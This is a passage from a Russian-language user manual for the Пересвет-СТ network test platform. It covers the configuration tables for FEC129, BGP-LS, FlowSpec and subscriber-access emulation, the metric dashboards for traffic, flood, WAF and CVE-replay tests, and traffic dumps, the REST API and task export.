Local MACsЛокальные MAC/IP, которые анонсируются в EVPNДобавьте MAC и при необходимости IP
B-MACBackbone MAC для PBB-EVPNЗаполняется в PBB-EVPN-сценариях
I-SIDService Instance IdentifierИспользуется в PBB-EVPN
B-VIDBackbone VLAN IDИспользуется в PBB-EVPN

Для EVPN-сценария BGP-сессия должна быть настроена на обмен EVPN-маршрутами. После запуска проверяйте количество локальных и удаленных MAC, состояние BGP-сессии и появление EVPN-маршрутов на тестируемом оборудовании.

FEC129

FEC129 используется для L2VPN-сценариев с адресацией Attachment Individual Identifier. Он позволяет проверить согласование pseudowire через FEC 129, работу локального и удаленного AII, меток, PE-списка и параметров PW.

Табл. 168.15 – Параметры FEC129

НазваниеОписаниеЗначение
Instance IDИдентификатор FEC129-инстансаУкажите уникальный номер
L2VPN IDИдентификатор L2VPN-сервисаЗаполните в формате, принятом на стенде
BGP session IDBGP-сессия для сигнализацииУкажите, если используется BGP
LDP instance IDLDP-инстанс для сигнализацииПо умолчанию 1
Route DistinguisherRD сервисаНапример 65000:129
Route TargetRT сервисаУкажите RT import/export
Local AII typeТип локального Attachment Individual IdentifierПо умолчанию 1
Local AII IDЛокальный AIIУкажите идентификатор attachment circuit
Local label baseБазовая локальная меткаПо умолчанию 60000
Max PW countМаксимальное количество PWПо умолчанию 16
PW typeТип pseudowireОбычно ethernet
Control wordИспользование control wordВключено по умолчанию
MTUMTU сервиса0 - использовать значение по умолчанию
PE listУдаленные PE и remote AIIДобавьте address, remote AII type и remote AII ID

FEC129 применяйте, когда нужно проверить L2VPN-сервисы с явной идентификацией attachment circuit. При диагностике сверяйте L2VPN ID, AII, RD/RT и метки на обеих сторонах.

BGP-LS

BGP-LS передает информацию о топологии сети через BGP. Протокол используется для проверки контроллеров, систем планирования, SDN-компонентов и устройств, которые получают link-state данные через BGP вместо прямого участия в IGP.

BGP-LS настраивается внутри BGP-сессии. Сначала создайте BGP-сессию, затем включите BGP-LS для этой сессии и заполните описание узлов, линков и префиксов.

Табл. 168.16 – Общие параметры BGP-LS

НазваниеОписаниеЗначение
Protocol IDИсточник link-state информацииIS-IS L1, IS-IS L2, OSPFv2 или OSPFv3
BGP-LS IdentifierИдентификатор BGP-LS домена0 или значение, принятое на стенде
NodesУзлы топологииДобавьте ASN, IGP Router ID, имя и router-id
LinksЛинки между узламиДобавьте локальный/удаленный узел, адреса, метрики и TE-параметры
PrefixesПрефиксы, привязанные к узламДобавьте prefix, длину, метрику, route tag и SID
Bulk JSONМассовая загрузка топологииИспользуйте для переноса большой топологии из внешней системы

Табл. 168.17 – Параметры узла BGP-LS

НазваниеОписаниеЗначение
ASNАвтономная система узлаУкажите ASN
IGP Router IDИдентификатор узла в IGPДля IS-IS - System ID, для OSPF - Router ID
BGP-LS IDДополнительный идентификатор доменаИспользуется при необходимости
OSPF AreaArea ID для OSPF-топологииНапример 0.0.0.0
Node nameЧеловекочитаемое имя узлаИспользуется для удобства анализа
Node flagsФлаги узлаЗаполняются при необходимости
IPv4/IPv6 Router IDRouter ID узлаУкажите адреса, которые должны быть переданы в BGP-LS
IS-IS Area IDArea ID для IS-ISНапример 49.0001
SR capabilitiesSegment Routing capabilitiesУкажите SRGB base/range и flags, если проверяется SR
SR algorithmsАлгоритмы Segment RoutingУкажите список поддерживаемых алгоритмов

Табл. 168.18 – Параметры линка BGP-LS

НазваниеОписаниеЗначение
Local ASN / Remote ASNASN локального и удаленного узлаУкажите стороны линка
Local / Remote IGP Router IDIGP Router ID локального и удаленного узлаДолжны совпадать с описанными nodes
Link local/remote IDИдентификаторы линкаИспользуются для точной идентификации канала
IPv4/IPv6 interface addressАдрес локального интерфейсаУкажите адрес на линке
IPv4/IPv6 neighbor addressАдрес соседаУкажите адрес удаленной стороны
MT IDMulti-topology ID0 для базового сценария
IGP metricIGP-метрика линкаУкажите метрику пути
TE default metricTraffic Engineering metricИспользуется для TE-сценариев
Admin groupАдминистративная группа линкаИспользуется для constraint-based routing
Metric typeТип метрикиНапример constant
Adjacency SID labelМетка Adj-SIDЗаполняется для SR-сценариев
Adjacency SID flagsФлаги Adj-SIDУкажите флаги, если они проверяются

Табл. 168.19 – Параметры префикса BGP-LS

НазваниеОписаниеЗначение
Local ASNASN узла, которому принадлежит префиксДолжен соответствовать node
Local IGP Router IDIGP Router ID узлаДолжен соответствовать node
PrefixАдрес префиксаНапример 10.0.0.0
Prefix lengthДлина маскиНапример 24
MT IDMulti-topology ID0 для базового сценария
OSPF route typeТип OSPF-маршрутаЗаполняется для OSPF-топологий
Prefix metricМетрика префиксаУкажите значение IGP
Route tag / Extended route tagТеги маршрутаИспользуются для политик и фильтрации
Prefix SID labelМетка Prefix-SIDЗаполняется для SR-сценариев
Prefix SID flagsФлаги Prefix-SIDУкажите при необходимости

BGP-LS удобно использовать вместе с автоматически сгенерированными IS-IS/OSPF-топологиями: сначала проверьте IGP-модель, затем передайте ее наружу через BGP-LS. Для больших топологий используйте Bulk JSON, чтобы не заполнять узлы и линки вручную.

BGP FlowSpec

BGP FlowSpec используется для анонса правил фильтрации и обработки трафика через BGP. В Пересвет-СТ FlowSpec-правила задаются внутри BGP-сессии и позволяют проверить, как оборудование принимает правила по destination/source, протоколу, портам, ICMP, TCP flags, длине пакета, DSCP и фрагментации.

Табл. 168.20 – Параметры BGP FlowSpec

НазваниеОписаниеЗначение
RuleОтдельное FlowSpec-правилоДобавьте одно или несколько правил
AFIСемейство адресов правилаIPv4 или IPv6
ComponentsНабор match-компонентов правилаДобавьте destination, source, protocol, ports и другие условия
AND with previousЛогическая связь компонента с предыдущимВключите, если несколько условий должны применяться совместно
OperatorОператор сравнения==, !=, <, >, <=, >=
ValueЗначение для сравненияCIDR для source/destination или число для остальных типов

Табл. 168.21 – Типы компонентов BGP FlowSpec

ТипНазначениеПример значения
destinationПрефикс назначения10.10.0.0/16
sourceПрефикс источника192.0.2.0/24
protocolIP protocol number6 для TCP, 17 для UDP
destination-portПорт назначения443
source-portПорт источника1024
icmp-typeICMP type8 для echo request
icmp-codeICMP code0
tcp-flagsTCP flagsЧисловое значение flags
packet-lengthДлина пакетаНапример 1500
dscpDSCPНапример 46 для EF
fragmentПризнак фрагментацииЧисловое значение компонента

Перед запуском убедитесь, что BGP-сессия согласована с FlowSpec-семейством адресов, а тестируемое оборудование поддерживает соответствующий тип FlowSpec. После запуска проверяйте, что правила приняты BGP-пиром и применились к нужному трафику. Для безопасной проверки начинайте с узких префиксов и ограниченного числа правил.

Access Plane

Access Plane описывает абонентский доступ и подготовку access-сессий перед запуском пользовательского трафика. В веб-интерфейсе этот раздел представлен вкладкой Access Groups конструктора задачи и используется для IPoE, PPPoE, DHCPv4/DHCPv6, SLAAC, 802.1x и связанных протоколов доступа.

Access Groups в конструкторе задачи

Рис. 12.1 – Вкладка Access Groups

Табл. 167.1 – Общие параметры Access Groups

НазваниеОписаниеЗначение
АгентАгент, на котором будет подниматься access-сессияВыберите агент из списка
СторонаКлиентская или серверная рольУкажите роль группы в задаче
ИнтерфейсСетевой интерфейс агентаВыберите интерфейс
Тип доступаIPoE, PPPoE или 802.1xВыберите тип по стенду
Outer VLANВнешний VLANУкажите значение или диапазон
Inner VLANВнутренний VLAN для Q-in-QУкажите значение или диапазон
VLAN stepШаг изменения VLAN в диапазонеИспользуется при массовой генерации сессий
Q-in-QИспользование двойного VLAN-тегаВключить/выключить

Табл. 167.2 – Параметры сессий access-группы

НазваниеОписаниеЗначение
CountКоличество абонентских сессийУкажите число сессий
Start RateСкорость старта сессийСессий в секунду
Stop RateСкорость остановки сессийСессий в секунду
Start DelayЗадержка перед стартомВ секундах
Max OutstandingМаксимальное число ожидающих операцийИспользуйте для ограничения параллелизма

Табл. 167.3 – Параметры DHCPv4, DHCPv6 и IPoE

НазваниеОписаниеЗначение
DHCP enableВключение DHCPv4Включить/выключить
BroadcastИспользование broadcast-запросовВключить/выключить
TimeoutТаймаут ожидания ответа DHCPВ секундах
RetryКоличество повторовУкажите число попыток
Release IntervalИнтервал освобождения адресовВ секундах
DHCPv6 enableВключение DHCPv6Включить/выключить
Rapid CommitDHCPv6 rapid commitВключить/выключить
SLAACПолучение IPv6-адреса через Router Advertisement без DHCPv6Включить режим IPv6 only
IPoE IPv4/IPv6Используемые семейства адресовВключите IPv4, IPv6 или оба режима
ARP Timeout/IntervalТаймеры ARP для IPoEУкажите значения в секундах

Табл. 167.4 – Параметры PPPoE и PPP

НазваниеОписаниеЗначение
Session TimeВремя жизни PPPoE-сессииВ секундах
ReconnectАвтоматическое переподключениеВключить/выключить
Discovery TimeoutТаймаут PPPoE discoveryВ секундах
Discovery RetryКоличество повторов discoveryУкажите число
Service NamePPPoE service nameУкажите при необходимости
Host-UniqИспользование Host-UniqВключить/выключить
Max PayloadМаксимальный payload PPPoEУкажите значение
MRUMaximum Receive Unit PPPУкажите размер
AuthenticationPAP или CHAPВыберите протокол и укажите логин/пароль
IPCP/IP6CPЗапрос IPv4/IPv6-параметровВключить нужные режимы

Табл. 167.5 – Дополнительные access-протоколы

ПротоколНазначениеОсновные параметры
L2TPЭмуляция L2TP/LNS для PPP-сценариевАдрес, secret, receive window, retry, hello interval, ToS
802.1xEAPoL-аутентификацияUsername, password, EAPOL version, max start, start/held/auth period
STP/RSTP/MSTPПроверка протоколов предотвращения петельInstance ID, mode, bridge priority, bridge MAC, hello/max age/forward delay
LACPПроверка агрегации каналовLAG interface, timeout, system priority, system ID, min/max active links
OpenFlowЭмуляция OpenFlow-устройства или контроллераRole, version 1.0/1.3, peer address, port, keepalive/hold/reconnect
gPTPПроверка 802.1AS timingRole, clock identity, priorities, clock class, sync/announce/pdelay intervals

Access Groups можно использовать совместно с Data Plane-плагинами. В таком случае access-сессии поднимаются до генерации пользовательского трафика, а трафик плагина использует подготовленную access-инфраструктуру.

L2TP

L2TP (Layer 2 Tunneling Protocol) применяется в access-сценариях для организации туннелей и PPP-сервисов между клиентской и серверной сторонами. В Пересвет-СТ L2TP используется вместе с настройками Access Groups, когда требуется проверить оборудование или сервисы, использующие L2TP/LNS для абонентского доступа.

Схема задачи

После добавления плагинов в клиентской или/и серверной конфигурации схема с описанием плагина клиентской части и направлением трафика в сторону выбранной цели. При нажатии на блок плагина в задании, открывается редактирование выбранного плагина, также как и открывается редактирование списке клиентских и серверных плагинов при нажатии на кнопку .

Пример схемы приведен на Рис 8.

Рис. 8

Рис. 8 – Полученная схема после конфигурации клиентского и серверного плагинов

Метрики и дашборды

Пересвет-СТ собирает метрики в реальном времени и экспортирует их в ClickHouse. Для визуализации результатов используется Grafana — каждому типу плагина соответствует один или несколько преднастроенных дашбордов. Дашборды доступны из веб-интерфейса Пересвет-СТ при запущенной задаче.

Под графиками дашбордов расположена кнопка «Экспорт в PDF», позволяющая сформировать отчёт по результатам задачи тестирования в формате PDF. Отчёт включает все графики и таблицы метрик текущего дашборда на выбранном временном интервале и может использоваться для документирования результатов испытаний, передачи заказчику или внутреннего аудита.

Общие метрики (Total)

Дашборд Total отображает агрегированные показатели по всем плагинам задачи:

МетрикаОписание
total.rx.packets / total.tx.packetsОбщее количество принятых / отправленных пакетов
total.rx.bytes / total.tx.bytesОбщий объём принятых / отправленных данных (байт)
total.tx.dropКоличество отброшенных пакетов при отправке
total.pkt.lostКоличество потерянных пакетов
total.rx.badКоличество принятых некорректных пакетов
total.tx.l1_bits / total.rx.l1_bitsБитрейт L1 (с учётом межкадровых интервалов и преамбул) TX / RX
total.tx.line_rate / total.rx.line_rateУтилизация линии (%) TX / RX
total.cpu_usageЗагрузка CPU ядер обработки
total.tos.rxПринятые пакеты с анализом поля ToS
total.rx.imissedПакеты, пропущенные NIC (переполнение очереди)
total.rx.ierrorsОшибки приёма на уровне NIC

HTTP / TLS

Дашборд Total HTTP/TLS — агрегация по всем HTTP-плагинам. Дашборд HTTP/TLS — детализация по конкретному плагину.

МетрикаОписание
http_1_1.tx.requests / http_1_1.rx.responsesОтправленные запросы / полученные ответы (HTTP/1.1)
http_1_1.tx.bytes / http_1_1.rx.bytesОбъём данных TX / RX
http_1_1.code.1xx–5xxРаспределение HTTP-кодов ответа (1xx, 2xx, 3xx, 4xx, 5xx)
http_1_1.ttfbTime To First Byte — задержка до первого байта ответа
http_1_1.ttlbTime To Last Byte — задержка до последнего байта ответа
http_1_1.method.get/post/put/patch/deleteКоличество запросов по HTTP-методам
http_2.tx.requests / http_2.rx.responsesОтправленные запросы / полученные ответы (HTTP/2)
http_2.code.1xx–5xxРаспределение HTTP-кодов ответа (HTTP/2)
http_2.ttfb / http_2.ttlbЗадержки TTFB / TTLB (HTTP/2)
http_2.streams.opened/closed/resetedКоличество открытых / закрытых / сброшенных стримов HTTP/2
tcp.cpsTCP Connections Per Second — новых соединений в секунду
tcp.ccTCP Concurrent Connections — текущие активные соединения
tcp.hs_avg_delayСредняя задержка TCP-хендшейка
tls_1_2.* / tls_1_3.*Аналогичные метрики в разрезе версий TLS (пакеты, байты, CPS, CC, Client/Server Hello, задержка хендшейка)

TCP Flood (SYN / SYN-ACK / ACK / RST / RST-ACK / FIN / FIN-ACK / PSH / PSH-ACK / Xmas)

Дашборд Total TCP — агрегация по всем TCP flood плагинам. Для каждого типа flood есть отдельный дашборд (например, TCP SYN, TCP ACK, TCP Xmas и т.д.).

МетрикаОписание
tcp.tx.flags.syn / tcp.rx.flags.synОтправленные / принятые SYN-пакеты
tcp.tx.flags.syn_ack / tcp.rx.flags.syn_ackОтправленные / принятые SYN-ACK-пакеты
tcp.tx.flags.ack / tcp.rx.flags.ackОтправленные / принятые ACK-пакеты
tcp.tx.flags.rst / tcp.rx.flags.rstОтправленные / принятые RST-пакеты
tcp.tx.flags.rst_ack / tcp.rx.flags.rst_ackОтправленные / принятые RST-ACK-пакеты
tcp.tx.flags.fin / tcp.rx.flags.finОтправленные / принятые FIN-пакеты
tcp.tx.flags.fin_ack / tcp.rx.flags.fin_ackОтправленные / принятые FIN-ACK-пакеты
tcp.tx.flags.psh / tcp.rx.flags.pshОтправленные / принятые PSH-пакеты
tcp.tx.flags.psh_ack / tcp.rx.flags.psh_ackОтправленные / принятые PSH-ACK-пакеты
tcp.tx.flags.xmas / tcp.rx.flags.xmasОтправленные / принятые Xmas-пакеты (все флаги)
tcp.tx.packets / tcp.rx.packetsОбщее количество TCP-пакетов TX / RX
tcp.tx.bytes / tcp.rx.bytesОбъём TCP-данных TX / RX

UDP Flood

Дашборд Total UDP — агрегация. Дашборд UDP — детализация.

МетрикаОписание
udp.tx.packets / udp.rx.packetsОтправленные / принятые UDP-пакеты
udp.tx.bytes / udp.rx.bytesОбъём UDP-данных TX / RX
udp.rtВремя отклика (round-trip) UDP
udp.dropПотерянные UDP-пакеты

GRE Flood

Дашборд Total GRE — агрегация. Дашборд GRE — детализация.

МетрикаОписание
gre.tx.packets / gre.rx.packetsОтправленные / принятые GRE-пакеты
gre.tx.bytes / gre.rx.bytesОбъём GRE-данных TX / RX

DNS Flood

Дашборд Total DNS Flood — агрегация. Дашборд DNS Flood — детализация.

МетрикаОписание
dns_flood.tx.packets / dns_flood.rx.packetsОтправленные / принятые DNS Flood-пакеты
dns_flood.tx.bytes / dns_flood.rx.bytesОбъём DNS Flood-данных TX / RX

DHCP Flood

Дашборд Total DHCP Flood — агрегация. Дашборд DHCP Flood — детализация.

МетрикаОписание
dhcp_flood.tx.packets / dhcp_flood.rx.packetsОтправленные / принятые DHCP Flood-пакеты
dhcp_flood.tx.bytes / dhcp_flood.rx.bytesОбъём DHCP Flood-данных TX / RX

WAF

Дашборд WAF отображает результаты тестирования Web Application Firewall — количество отправленных запросов по каждой категории атак:

Группа метрикОписание
waf.broken_access_control, waf.injection.*, waf.xss.*, waf.ssrf и др.Базовое тестирование: по одной метрике на каждый тип атаки (18 категорий)
waf.sqli.*SQLi Advanced: 50 типов SQL-инъекций
waf.xxe.*XXE Advanced: 4 типа атак на XML-парсер
waf.cmdi.*Command Injection Advanced: 18 типов OS-команд
waf.fi.*File Injection Advanced: 8 типов включения файлов
waf.pt.*Path Traversal Advanced: 17 типов обхода путей
waf.unc.*UNC Path: 4 типа атак через UNC-пути
waf.rce.*RCE Advanced: 6 типов удалённого выполнения кода
waf.xss.* (advanced)XSS Advanced: 19 типов межсайтового скриптинга
waf.ssrf.* (advanced)SSRF Advanced: 19 типов подделки серверных запросов
waf.ssti.*SSI/SSTI Advanced: 7 типов серверных инъекций шаблонов
waf.graphql.*GraphQL: 2 типа атак на схему GraphQL

DNS

Дашборд Total DNS — агрегация по всем DNS-плагинам. Отдельные дашборды: DNS over UDP, DNS over TCP, DNS over TLS, DNS over HTTP.

МетрикаОписание
dns.tx.queries / dns.rx.responsesОтправленные запросы / полученные ответы
dns.tx.bytes / dns.rx.bytesОбъём DNS-данных TX / RX
dns.rx.rcode.okОтветы с кодом NOERROR
dns.rx.rcode.format_errorОтветы с кодом FORMERR
dns.rx.rcode.server_failureОтветы с кодом SERVFAIL
dns.rx.rcode.name_errorОтветы с кодом NXDOMAIN
dns.rx.rcode.not_implementedОтветы с кодом NOTIMP
dns.rx.rcode.refusedОтветы с кодом REFUSED
dns.rx.flags.aa/tc/rd/raФлаги DNS-ответов: Authoritative, Truncated, Recursion Desired/Available
dns.tls_1_2.* / dns.tls_1_3.*Метрики DNS over TLS в разрезе версий TLS (пакеты, байты, CC)

MHDDoS Emulation

Дашборд MHDDoS отображает комбинированные метрики всех активных подплагинов (SYN Flood, UDP Flood, GRE Flood, STRESS и др.) в рамках одной задачи MHDDoS.

PCAP Replay, HAR Replay и Динамические приложения

Для сценариев воспроизведения реального трафика доступны отдельные дашборды, которые помогают сравнить отправленный и принятый объем, скорость воспроизведения и состояние сессий.

Группа метрикОписание
PCAP Replay StatelessПакеты, байты и скорость воспроизведения raw-пакетов из PCAP
PCAP Replay StatefulСессии, пакеты, байты и скорость воспроизведения выбранных TCP/UDP-сессий
HAR ReplayHTTP-запросы, ответы, задержки и ошибки при воспроизведении HAR-файла
ApplicationsАктивные пользователи, запущенные/завершенные потоки, неуспешные потоки и общий объем трафика

CVE Replay и передача файлов

Группа метрикОписание
CVE ReplayПопытки воспроизведения, завершенные сценарии, блокировки, таймауты и события по выбранным CVE
File TransferЗапросы, ответы, объем переданных файлов и задержки передачи
Malware File TransferПереданные PTI-файлы, ответы принимающей стороны и результаты проверки средств защиты

RoCEv2, Elephant Flow и L2 Convergence

Группа метрикОписание
RoCEv2Пакеты, байты, скорость и события перегрузки RoCEv2
Elephant Flow TCPДлительные TCP-потоки, объем данных, скорость и состояние сессий
Elephant Flow UDPДлительные UDP-потоки, пакеты, байты и скорость передачи
L2 Convergence UDPПотери, восстановление потока и расчет времени сходимости

IPsec

Для IPsec-сценариев используйте общие дашборды трафика и специализированные панели туннелей. Производительные результаты массовых IPsec-сценариев опубликованы в разделе Benchmarks.

Группа метрикОписание
Активные туннелиТекущее число поднятых IPsec-туннелей
Открытие туннелейДинамика создания туннелей во времени
Трафик через IPsecПакеты, байты и скорость передачи внутри туннелей
Ошибки и событияОшибки установления, разрывы и диагностические события туннельных сценариев

Dual-режим (клиент + сервер)

При одновременном запуске клиентского и серверного плагинов доступны дашборды с суффиксом Dual, объединяющие метрики обеих сторон на одном экране:

ДашбордОписание
Total DualОбщие метрики клиента и сервера
Total HTTP/TLS DualHTTP/TLS агрегация клиент + сервер
HTTP/TLS DualДетализация HTTP/TLS клиент + сервер

Служебные метрики

Дополнительные метрики, доступные на общих дашбордах:

МетрикаОписание
arp.rx/tx.packets, arp.rx/tx.bytesARP-трафик (автоматический, для резолвинга MAC-адресов)
icmp.rx/tx.packets, icmp.rx/tx.bytesICMP-трафик (автоматические ответы на ping и др.)
kni.rx/tx.packets, kni.rx/tx.bytesТрафик через KNI-интерфейс (перенаправление в ядро ОС)
other.rxПрочие принятые пакеты, не относящиеся к плагинам

Логи и события задачи

Логи и события используются для оперативной диагностики задачи. Метрики показывают числовое состояние сценария, а логи и события объясняют, что происходило во время запуска: какие агенты участвовали, какие протоколы поднялись, где возникли ошибки согласования и какие действия выполнялись пользователем или системой.

Логи выполнения

Вкладка «Логи» отображает журнал выполнения задачи. В ней доступны поиск по тексту, фильтрация по агенту, выбор уровня логирования, скачивание лога, копирование содержимого и автопрокрутка к последним сообщениям. Логи используются для проверки старта задачи, диагностики ошибок конфигурации, анализа падений сессий и подтверждения завершения сценария.

При анализе логов сначала проверьте сообщения уровня Ошибки, затем перейдите к информационным сообщениям нужного агента. Если задача использует несколько плоскостей одновременно, например Data Plane и Control Plane, фильтрация по агенту помогает отделить сетевые события от ошибок генерации трафика.

События Control Plane и access-сценариев

События фиксируют изменения состояния протоколов и сессий: установление или потерю соседства, изменение состояния BGP/LDP/OSPF/IS-IS, события multicast, OAM, L2VPN, access-сессий и туннелей. Такие события используются вместе с метриками, чтобы понять не только итоговое значение счетчика, но и момент, когда состояние изменилось.

Для control-plane сценариев проверяйте последовательность событий соседства и сигнализации. Для access-сценариев обращайте внимание на этапы авторизации и выдачи адресов: старт сессии, DHCP/PPPoE/802.1x обмен, получение IP-параметров и завершение сессии.

Действия с задачей

На странице задачи доступны основные действия жизненного цикла сценария:

ДействиеНазначение
Создать задачуОткрывает конструктор и позволяет собрать Data Plane, Control Plane и Access Plane конфигурацию
Запустить задачуПередает конфигурацию агентам и запускает выбранные сценарии
Остановить задачуЗавершает активный запуск и переводит задачу в состояние остановки
Открыть задачуПоказывает конфигурацию, схему, метрики, события и логи
Удалить задачуУдаляет запись задачи из списка
Запросить дампЗапрашивает запись трафика с выбранного агента, если включена запись дампов
Экспортировать отчетФормирует PDF-отчет по выбранному дашборду метрик

Перед запуском задачи проверьте, что все используемые агенты доступны, лицензия активна, сети и интерфейсы выбраны корректно, а связанные объекты библиотеки синхронизированы с агентами.

Дампы трафика

Вкладка "Дампы трафика" в веб-интерфейсе позволяет включать запись входящего и исходящего трафика в формате pcap, а также запрашивать эти записи с агента как до завершения, так и после завершения задачи по генерации трафика.

Включение записи трафика

Для просмотра записи отправленного и принятого трафика Пересвет-СТ необходимо включить запись дампов трафика. Включение записи трафика активируется на всех агентах одновременно.

Для этого необходимо:

  1. Подключиться к веб-интерфейсу Пересвет-СТ.

  2. Перейти в раздел Задачи

  3. Выбрать задачу, по которой необходимо собрать запись трафика.

  4. Перейти в настройки включения записи трафика, нажав на кнопку «Дампы трафика» (см. Рис. 9)

Рис. 9

Рис. 9 – Кнопка «Дампы трафика»

  1. Переключите тумблер «Запись дампов трафика»

  2. Заполните поле «Значение»

  3. выберите величину из списка:

    • Bytes – в байтах;
    • KB – в килобайтах;
    • MB – в мегобайтах;
    • GB – в гигобайтах.
  4. Далее необходимо перейти в настройки выбранной задачи и запустить задачу;

  5. Далее перейти настройки включения записи трафика, нажав на кнопку «Дампы трафика»;

  6. В окне «Дампы трафика» присутствует таблица с сделанными записями трафика. Справа от выбранной записи нажмите кнопку «Скачать» и дождитесь загрузки записи трафика.

В этой таблице отображаются дампы, собранные в процессе выполнения данной задачи. Для их появления и возможности скачивания должна быть активирована опция записи. Снимки попадают в таблицу в следующих случаях: • Когда задача завершается (неважно, автоматически или вы сделали это вручную); • Если во время выполнения задачи запросили дамп с какого-то конкретного агента. Для повторного запроса записи файлов с агента необходимо нажать кнопку «Обновить список файлов».

Запрос записи трафика

В процессе выполнения задачи вы можете запросить дамп у агента. После отправки запроса на получение дампа, файл появится на контроллере. При завершении задачи, дампы автоматически загружаются на контроллер и доступны для скачивания. Для этого необходимо:

  1. Подключиться к веб-интерфейсу Пересвет-СТ.

  2. Перейти в раздел Задачи

  3. Выбрать задачу, по которой необходимо собрать запись трафика.

  4. Перейти в настройки включения записи трафика, нажав на кнопку «Дампы трафика» (см. Рис. 9), убедится, что запись дампов трафика включена.

  5. Далее необходимо вернуться в задачу и включить ее.

  6. Далее вернуться в настройки включения записи трафика, нажав на кнопку «Дампы трафика»

  7. В окне «Дампы трафика» нажать на кнопку «Задействованные агенты»

  8. Далее, в строке необходимого агента нажмите на кнопку «Запросить дамп»

  9. Далее необходимо нажать на кнопку «Обзор файлов»

Важно: процесс запроса дампа трафика с агента на контроллер занимает некоторое время в зависимости от нагрузки внутри задачи и объёма дампа трафика.

  1. Далее необходимо нажать на кнопку «Обновить список файлов»

  2. В окне «Дампы трафика» присутствует таблица с сделанными записями трафика. Справа от появившейся записи нажмите кнопку «Скачать» и дождитесь загрузки записи трафика.

Управление через REST API

Помимо веб-интерфейса, Пересвет-СТ предоставляет REST API для программного управления системой. API контроллера доступен по порту 8080 и использует JWT-аутентификацию — токен передаётся в cookies после прохождения авторизации. Через API можно выполнять все основные операции: управление задачами (создание, запуск, остановка, удаление), настройку агентов и сетей, управление пользователями и группами. Это позволяет автоматизировать сценарии тестирования, интегрировать Пересвет-СТ в CI/CD-пайплайны и управлять платформой из внешних скриптов или оркестраторов. Для взаимодействия с API достаточно любого HTTP-клиента (curl, Postman+, Python requests и т.д.).

Экспорт и перенос задач

Задачу можно выгрузить из Пересвет-СТ в нескольких форматах. Формат выбирается на странице задачи: откройте Задачи, перейдите в нужную задачу, нажмите Параметры и выберите подходящий вариант экспорта.

Меню экспорта задачи в Пересвет-СТ

Меню параметров задачи с вариантами экспорта

ВариантЧто скачиваетсяКогда использовать
Экспорт задачи с зависимостямиЗашифрованный архив .pa-task-export с конфигурацией задачи и переносимыми объектами библиотекДля переноса задачи на другой стенд вместе с сетями, MAC-объектами, сертификатами, туннелями, CVE-сигнатурами, динамическими приложениями и описанием используемых файлов
Экспортировать задачу в JSONОдин JSON-файл с конфигурацией задачиДля быстрого копирования задачи на стенд, где уже есть все нужные сети, файлы, приложения и другие библиотечные объекты
Экспортировать задачу в PythonZIP-архив с конфигурацией задачи и готовым Python-клиентом REST APIДля автоматизации: создать копию задачи через API, запустить её, остановить или дождаться завершения из скрипта

Экспорт задачи с зависимостями

Формат .pa-task-export предназначен для переноса задачи между стендами. Перед скачиванием контроллер собирает план экспорта и показывает, какие зависимости найдены в задаче:

  • сети и их параметры, включая MAC-политику и ручные MAC-исключения;
  • MAC-адреса из библиотеки;
  • сертификаты и закрытые ключи;
  • туннели;
  • CVE-сигнатуры, если задача использует CVE Replay или связанные файлы;
  • динамические приложения;
  • сведения о файлах PCAP, HAR, пользовательских файлах и malware-файлах;
  • описания агентов, которые использовались в задаче.

Архив шифруется и сохраняется с именем вида peresvet-st-task-<ID>.pa-task-export. Внутри архива находятся конфигурация задачи, манифест экспорта и JSON-описания переносимых объектов. Пользователю не нужно вручную распаковывать или изменять архив.

В окне экспорта отображаются счетчики зависимостей: сети, MAC, сертификаты, туннели, CVE, приложения, файлы и агенты. Если часть зависимостей требует внимания, Пересвет-СТ показывает предупреждение до скачивания архива.

Окно экспорта задачи с зависимостями

Окно экспорта переносимого архива .pa-task-export

Файловые payload по умолчанию не вкладываются в архив. Это защищает пользователя от случайного скачивания очень крупных наборов данных: например, задач с большими PCAP/HAR или большим количеством malware-файлов. Если нужно перенести сами файлы, включите опцию «Включить файловые payload». Malware payload включается отдельной опцией и подходит только для небольших переносимых наборов. Если payload не включён, файлы останутся внешней зависимостью: на целевом стенде их нужно заранее загрузить или выбрать из локальной библиотеки.

Агенты и PCI interfaces не переносятся физически. Их идентификаторы зависят от конкретного стенда, поэтому в архив попадает только описание исходных агентов и интерфейсов. При проверке архива на другом стенде такие ресурсы должны быть сопоставлены с локальными агентами и портами.

Проверка архива перед импортом

Архив .pa-task-export можно выбрать в окне импорта задач: откройте Задачи, нажмите меню создания задачи и выберите «Импортировать задачи». В область загрузки можно перетащить один или несколько файлов .json или .pa-task-export.

Проверка .pa-task-export архива перед импортом

Проверка переносимого архива перед импортом задачи

Для .pa-task-export контроллер сначала выполняет безопасную проверку без изменений в базе данных. На этом этапе Пересвет-СТ читает архив, сверяет зависимости с локальными библиотеками и показывает таблицу статусов:

СтатусЧто означаетДействие пользователя
НайденоНа целевом стенде уже есть объект с тем же отпечатком или идентичным содержимымПовторно создавать объект не нужно
Будет созданоТакого объекта на стенде нет, но в архиве достаточно данных для его созданияПроверьте название и состав объекта перед импортом
Нужен выборОбъект зависит от стенда: например, исходный агент или PCI interface нельзя перенести автоматическиВыберите локального агента или интерфейс из списка
Нет payloadВ архиве есть ссылка на файл, но сам файловый payload не вложен и совпадающий файл не найден локальноЗагрузите файл на целевой стенд или повторите экспорт с включением payload
КонфликтНа стенде найден объект с тем же пользовательским идентификатором, но другим содержимымПроверьте локальный объект и решите, какой вариант должен использоваться

Если выбрано несколько архивов, каждый файл проверяется отдельным блоком. Это удобно для массового переноса: пользователь видит состав каждой задачи, общие зависимости и ресурсы, которые требуют выбора. Одинаковые объекты не нужно переносить вручную несколько раз — при проверке они сопоставляются с локальной библиотекой по содержимому, имени, идентификатору или отпечатку в зависимости от типа объекта.

На текущем этапе .pa-task-export используется для переносимого экспорта и проверки зависимостей перед импортом. Если на конкретной версии стенда кнопка создания задачи из .pa-task-export недоступна, используйте проверку архива как список необходимых действий: загрузите отсутствующие файлы, создайте или сопоставьте стендовые ресурсы, затем используйте JSON-экспорт или Python-архив для создания задачи.

Экспорт задачи в JSON

JSON-экспорт сохраняет только конфигурацию задачи. Такой файл подходит для быстрых копий на том же стенде или между стендами с одинаково подготовленными библиотеками. В JSON не попадают сетевые объекты, сертификаты, файлы, динамические приложения, CVE-сигнатуры, агенты и PCI interfaces как самостоятельные объекты библиотеки.

При импорте JSON-файла Пересвет-СТ создаёт новую задачу с конфигурацией из файла. Если в конфигурации есть ссылки на объекты, которых нет на целевом стенде, задачу нужно дополнительно проверить и отредактировать перед запуском.

Автоматизация через Python

